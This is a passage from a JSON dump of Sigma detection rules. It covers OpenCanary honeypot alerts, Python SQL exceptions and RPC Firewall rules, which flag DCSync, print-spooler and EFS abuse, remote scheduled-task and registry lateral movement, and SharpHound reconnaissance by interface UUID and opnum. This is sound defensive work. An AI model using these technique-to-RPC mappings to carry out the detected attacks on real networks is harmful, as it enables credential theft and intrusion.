    "content": "title: OpenCanary - SMB File Open Request\nid: 22777c9e-873a-4b49-855f-6072ab861a52\nstatus: test\ndescription: Detects instances where an SMB service on an OpenCanary node has had a file open request.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.lateral-movement\n    - attack.collection\n    - attack.t1021\n    - attack.t1005\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 5000\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_snmp_cmd.yml",
    "content": "title: OpenCanary - SNMP OID Request\nid: e9856028-fd4e-46e6-b3d1-10f7ceb95078\nstatus: test\ndescription: Detects instances where an SNMP service on an OpenCanary node has had an OID request.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.discovery\n    - attack.lateral-movement\n    - attack.t1016\n    - attack.t1021\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 13001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_ssh_login_attempt.yml",
    "content": "title: OpenCanary - SSH Login Attempt\nid: ff7139bc-fdb1-4437-92f2-6afefe8884cb\nstatus: test\ndescription: Detects instances where an SSH service on an OpenCanary node has had a login attempt.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.lateral-movement\n    - attack.persistence\n    - attack.t1133\n    - attack.t1021\n    - attack.t1078\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 4002\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_ssh_new_connection.yml",
    "content": "title: OpenCanary - SSH New Connection Attempt\nid: cd55f721-5623-4663-bd9b-5229cab5237d\nstatus: test\ndescription: Detects instances where an SSH service on an OpenCanary node has had a connection attempt.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.privilege-escalation\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.lateral-movement\n    - attack.persistence\n    - attack.t1133\n    - attack.t1021\n    - attack.t1078\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 4000\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_telnet_login_attempt.yml",
    "content": "title: OpenCanary - Telnet Login Attempt\nid: 512cff7a-683a-43ad-afe0-dd398e872f36\nstatus: test\ndescription: Detects instances where a Telnet service on an OpenCanary node has had a login attempt.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.defense-evasion\n    - attack.initial-access\n    - attack.command-and-control\n    - attack.t1133\n    - attack.t1078\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 6001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_tftp_request.yml",
    "content": "title: OpenCanary - TFTP Request\nid: b4e6b016-a2ac-4759-ad85-8000b300d61e\nstatus: test\ndescription: Detects instances where a TFTP service on an OpenCanary node has had a request.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.exfiltration\n    - attack.t1041\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 10001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/opencanary/opencanary_vnc_connection_attempt.yml",
    "content": "title: OpenCanary - VNC Connection Attempt\nid: 9db5446c-b44a-4291-8b89-fcab5609c3b3\nstatus: test\ndescription: Detects instances where a VNC service on an OpenCanary node has had a connection attempt.\nreferences:\n    - https://opencanary.readthedocs.io/en/latest/starting/configuration.html#services-configuration\n    - https://github.com/thinkst/opencanary/blob/a0896adfcaf0328cfd5829fe10d2878c7445138e/opencanary/logger.py#L52\nauthor: Security Onion Solutions\ndate: 2024-03-08\ntags:\n    - attack.lateral-movement\n    - attack.t1021\nlogsource:\n    category: application\n    product: opencanary\ndetection:\n    selection:\n        logtype: 12001\n    condition: selection\nfalsepositives:\n    - Unlikely\nlevel: high\n"
  },
  {
    "path": "rules/application/python/app_python_sql_exceptions.yml",
    "content": "title: Python SQL Exceptions\nid: 19aefed0-ffd4-47dc-a7fc-f8b1425e84f9\nstatus: stable\ndescription: Generic rule for SQL exceptions in Python according to PEP 249\nreferences:\n    - https://www.python.org/dev/peps/pep-0249/#exceptions\nauthor: Thomas Patzke\ndate: 2017-08-12\nmodified: 2020-09-01\ntags:\n    - attack.initial-access\n    - attack.t1190\nlogsource:\n    category: application\n    product: python\ndetection:\n    keywords:\n        - DataError\n        - IntegrityError\n        - ProgrammingError\n        - OperationalError\n    condition: keywords\nfalsepositives:\n    - Application bugs\nlevel: medium\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_atsvc_lateral_movement.yml",
    "content": "title: Remote Schedule Task Lateral Movement via ATSvc\nid: 0fcd1c79-4eeb-4746-aba9-1b458f7a79cb\nstatus: test\ndescription: Detects remote RPC calls to create or execute a scheduled task via ATSvc\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.privilege-escalation\n    - attack.lateral-movement\n    - attack.execution\n    - attack.persistence\n    - attack.t1053\n    - attack.t1053.002\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:1ff70682-0a51-30e8-076d-740be8cee98b\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b\n        OpNum:\n            - 0\n            - 1\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_atsvc_recon.yml",
    "content": "title: Remote Schedule Task Recon via AtScv\nid: f177f2bc-5f3e-4453-b599-57eefce9a59c\nstatus: test\ndescription: Detects remote RPC calls to read information about scheduled tasks via AtScv\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.discovery\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:1ff70682-0a51-30e8-076d-740be8cee98b\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 1ff70682-0a51-30e8-076d-740be8cee98b\n    filter:\n        OpNum:\n            - 0\n            - 1\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_dcsync_attack.yml",
    "content": "title: Possible DCSync Attack\nid: 56fda488-113e-4ce9-8076-afc2457922c3\nstatus: test\ndescription: Detects remote RPC calls to MS-DRSR from non DC hosts, which could indicate DCSync / DCShadow attacks.\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-drsr/f977faaa-673e-4f66-b9bf-48c640241d47?redirectedfrom=MSDN\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-DRSR.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.t1033\n    - attack.discovery\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes, enable DRSR UUID (e3514235-4b06-11d1-ab04-00c04fc2dcd2) for \"dangerous\" opcodes (not 0,1 or 12) only from trusted IPs (DCs)'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: e3514235-4b06-11d1-ab04-00c04fc2dcd2\n    filter:\n        OpNum:\n            - 0\n            - 1\n            - 12\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_efs_abuse.yml",
    "content": "title: Remote Encrypting File System Abuse\nid: 5f92fff9-82e2-48eb-8fc1-8b133556a551\nstatus: test\ndescription: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-36942\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-EFSR.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.lateral-movement\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:df1941c5-fe89-4e79-bf10-463657acf44d or c681d488-d850-11d0-8c52-00c04fd90f7e'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid:\n            - df1941c5-fe89-4e79-bf10-463657acf44d\n            - c681d488-d850-11d0-8c52-00c04fd90f7e\n    condition: selection\nfalsepositives:\n    - Legitimate usage of remote file encryption\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_eventlog_recon.yml",
    "content": "title: Remote Event Log Recon\nid: 2053961f-44c7-4a64-b62d-f6e72800af0d\nstatus: test\ndescription: Detects remote RPC calls to get event log information via EVEN or EVEN6\nreferences:\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.discovery\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:82273fdc-e32a-18c3-3f78-827929dc23ea and uuid:f6beaff7-1e19-4fbb-9f8f-b89e2018337c\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid:\n            - 82273fdc-e32a-18c3-3f78-827929dc23ea\n            - f6beaff7-1e19-4fbb-9f8f-b89e2018337c\n    condition: selection\nfalsepositives:\n    - Remote administrative tasks on Windows Events\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_lateral_movement.yml",
    "content": "title: Remote Schedule Task Lateral Movement via ITaskSchedulerService\nid: ace3ff54-e7fd-46bd-8ea0-74b49a0aca1d\nstatus: test\ndescription: Detects remote RPC calls to create or execute a scheduled task\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.privilege-escalation\n    - attack.persistence\n    - attack.execution\n    - attack.lateral-movement\n    - attack.t1053\n    - attack.t1053.002\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:86d35949-83c9-4044-b424-db363231fd0c\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c\n        OpNum:\n            - 1\n            - 3\n            - 4\n            - 10\n            - 11\n            - 12\n            - 13\n            - 14\n            - 15\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_itaskschedulerservice_recon.yml",
    "content": "title: Remote Schedule Task Recon via ITaskSchedulerService\nid: 7f7c49eb-2977-4ac8-8ab0-ab1bae14730e\nstatus: test\ndescription: Detects remote RPC calls to read information about scheduled tasks\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.discovery\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:86d35949-83c9-4044-b424-db363231fd0c\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 86d35949-83c9-4044-b424-db363231fd0c\n    filter:\n        OpNum:\n            - 1\n            - 3\n            - 4\n            - 10\n            - 11\n            - 12\n            - 13\n            - 14\n            - 15\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_printing_lateral_movement.yml",
    "content": "title: Remote Printing Abuse for Lateral Movement\nid: bc3a4b0c-e167-48e1-aa88-b3020950e560\nstatus: test\ndescription: Detects remote RPC calls to possibly abuse remote printing service via MS-RPRN / MS-PAR\nreferences:\n    - https://msrc.microsoft.com/update-guide/vulnerability/CVE-2021-34527\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rprn/d42db7d5-f141-4466-8f47-0a4be14e2fc1\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-pan/e44d984c-07d3-414c-8ffc-f8c8ad8512a8\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RPRN-PAR.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.lateral-movement\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:12345678-1234-abcd-ef00-0123456789ab or 76f03f96-cdfd-44fc-a22c-64950a001209 or ae33069b-a2a8-46ee-a235-ddfd339be281 or 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid:\n            - 12345678-1234-abcd-ef00-0123456789ab\n            - 76f03f96-cdfd-44fc-a22c-64950a001209\n            - 0b6edbfa-4a24-4fc6-8a23-942b1eca65d1\n            - ae33069b-a2a8-46ee-a235-ddfd339be281\n    condition: selection\nfalsepositives:\n    - Actual printing\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_remote_dcom_or_wmi.yml",
    "content": "title: Remote DCOM/WMI Lateral Movement\nid: 68050b10-e477-4377-a99b-3721b422d6ef\nstatus: test\ndescription: Detects remote RPC calls that performs remote DCOM operations. These could be abused for lateral movement via DCOM or WMI.\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.lateral-movement\n    - attack.execution\n    - attack.t1021.003\n    - attack.t1047\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:367abb81-9844-35f1-ad32-98f038001003'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid:\n            - 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57\n            - 99fcfec4-5260-101b-bbcb-00aa0021347a\n            - 000001a0-0000-0000-c000-000000000046\n            - 00000131-0000-0000-c000-000000000046\n            - 00000143-0000-0000-c000-000000000046\n            - 00000000-0000-0000-c000-000000000046\n    condition: selection\nfalsepositives:\n    - Some administrative tasks on remote host\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_remote_registry_lateral_movement.yml",
    "content": "title: Remote Registry Lateral Movement\nid: 35c55673-84ca-4e99-8d09-e334f3c29539\nstatus: test\ndescription: Detects remote RPC calls to modify the registry and possible execute code\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.defense-evasion\n    - attack.lateral-movement\n    - attack.t1112\n    - attack.persistence\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:338cd001-2244-31f1-aaaa-900038001003\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 338cd001-2244-31f1-aaaa-900038001003\n        OpNum:\n            - 6\n            - 7\n            - 8\n            - 13\n            - 18\n            - 19\n            - 21\n            - 22\n            - 23\n            - 35\n    condition: selection\nfalsepositives:\n    - Remote administration of registry values\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_remote_registry_recon.yml",
    "content": "title: Remote Registry Recon\nid: d8ffe17e-04be-4886-beb9-c1dd1944b9a8\nstatus: test\ndescription: Detects remote RPC calls to collect information\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-rrp/0fa3191d-bb79-490a-81bd-54c2601b7a78\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-RRP.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.discovery\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:338cd001-2244-31f1-aaaa-900038001003\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 338cd001-2244-31f1-aaaa-900038001003\n    filter:\n        OpNum:\n            - 6\n            - 7\n            - 8\n            - 13\n            - 18\n            - 19\n            - 21\n            - 22\n            - 23\n            - 35\n    condition: selection and not filter\nfalsepositives:\n    - Remote administration of registry values\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_remote_server_service_abuse.yml",
    "content": "title: Remote Server Service Abuse\nid: b6ea3cc7-542f-43ef-bbe4-980fbed444c7\nstatus: test\ndescription: Detects remote RPC calls to possibly abuse remote encryption service via MS-SRVS\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.lateral-movement\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:4b324fc8-1670-01d3-1278-5a47bf6ee188'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 4b324fc8-1670-01d3-1278-5a47bf6ee188\n    condition: selection\nfalsepositives:\n    - Legitimate remote share creation\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_remote_service_lateral_movement.yml",
    "content": "title: Remote Server Service Abuse for Lateral Movement\nid: 10018e73-06ec-46ec-8107-9172f1e04ff2\nstatus: test\ndescription: Detects remote RPC calls to possibly abuse remote encryption service via MS-EFSR\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/accf23b0-0f57-441c-9185-43041f1b0ee9\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SCMR.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.lateral-movement\n    - attack.execution\n    - attack.t1569.002\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:367abb81-9844-35f1-ad32-98f038001003'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 367abb81-9844-35f1-ad32-98f038001003\n    condition: selection\nfalsepositives:\n    - Administrative tasks on remote services\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_sasec_lateral_movement.yml",
    "content": "title: Remote Schedule Task Lateral Movement via SASec\nid: aff229ab-f8cd-447b-b215-084d11e79eb0\nstatus: test\ndescription: Detects remote RPC calls to create or execute a scheduled task via SASec\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.privilege-escalation\n    - attack.lateral-movement\n    - attack.execution\n    - attack.persistence\n    - attack.t1053\n    - attack.t1053.002\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:378e52b0-c0a9-11cf-822d-00aa0051e40f\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f\n        OpNum:\n            - 0\n            - 1\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_sasec_recon.yml",
    "content": "title: Recon Activity via SASec\nid: 0a3ff354-93fc-4273-8a03-1078782de5b7\nstatus: test\ndescription: Detects remote RPC calls to read information about scheduled tasks via SASec\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-tsch/d1058a28-7e02-4948-8b8d-4a347fa64931\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-TSCH.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.discovery\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:378e52b0-c0a9-11cf-822d-00aa0051e40f\"'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 378e52b0-c0a9-11cf-822d-00aa0051e40f\n    filter:\n        OpNum:\n            - 0\n            - 1\n    condition: selection and not filter\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_sharphound_recon_account.yml",
    "content": "title: SharpHound Recon Account Discovery\nid: 65f77b1e-8e79-45bf-bb67-5988a8ce45a5\nstatus: test\ndescription: Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-wkst/55118c55-2122-4ef9-8664-0c1ff9e168f3\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-WKST.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.t1087\n    - attack.discovery\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:6bffd098-a112-3610-9833-46c3f87e345a opnum:2'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 6bffd098-a112-3610-9833-46c3f87e345a\n        OpNum: 2\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/rpc_firewall/rpc_firewall_sharphound_recon_sessions.yml",
    "content": "title: SharpHound Recon Sessions\nid: 6d580420-ff3f-4e0e-b6b0-41b90c787e28\nstatus: test\ndescription: Detects remote RPC calls useb by SharpHound to map remote connections and local group membership.\nreferences:\n    - https://learn.microsoft.com/en-us/openspecs/windows_protocols/ms-srvs/02b1f559-fda2-4ba3-94c2-806eb2777183\n    - https://github.com/jsecurity101/MSRPC-to-ATTACK/blob/ddd4608fe8684fcf2fcf9b48c5f0b3c28097f8a3/documents/MS-SRVS.md\n    - https://github.com/zeronetworks/rpcfirewall\n    - https://zeronetworks.com/blog/stopping-lateral-movement-via-the-rpc-firewall/\nauthor: Sagie Dulce, Dekel Paz\ndate: 2022-01-01\ntags:\n    - attack.discovery\n    - attack.t1033\nlogsource:\n    product: rpc_firewall\n    category: application\n    definition: 'Requirements: install and apply the RPC Firewall to all processes with \"audit:true action:block uuid:4b324fc8-1670-01d3-1278-5a47bf6ee188 opnum:12'\ndetection:\n    selection:\n        EventLog: RPCFW\n        EventID: 3\n        InterfaceUuid: 4b324fc8-1670-01d3-1278-5a47bf6ee188\n        OpNum: 12\n    condition: selection\nfalsepositives:\n    - Unknown\nlevel: high\n"
  },
  {
    "path": "rules/application/ruby/appframework_ruby_on_rails_exceptions.yml",
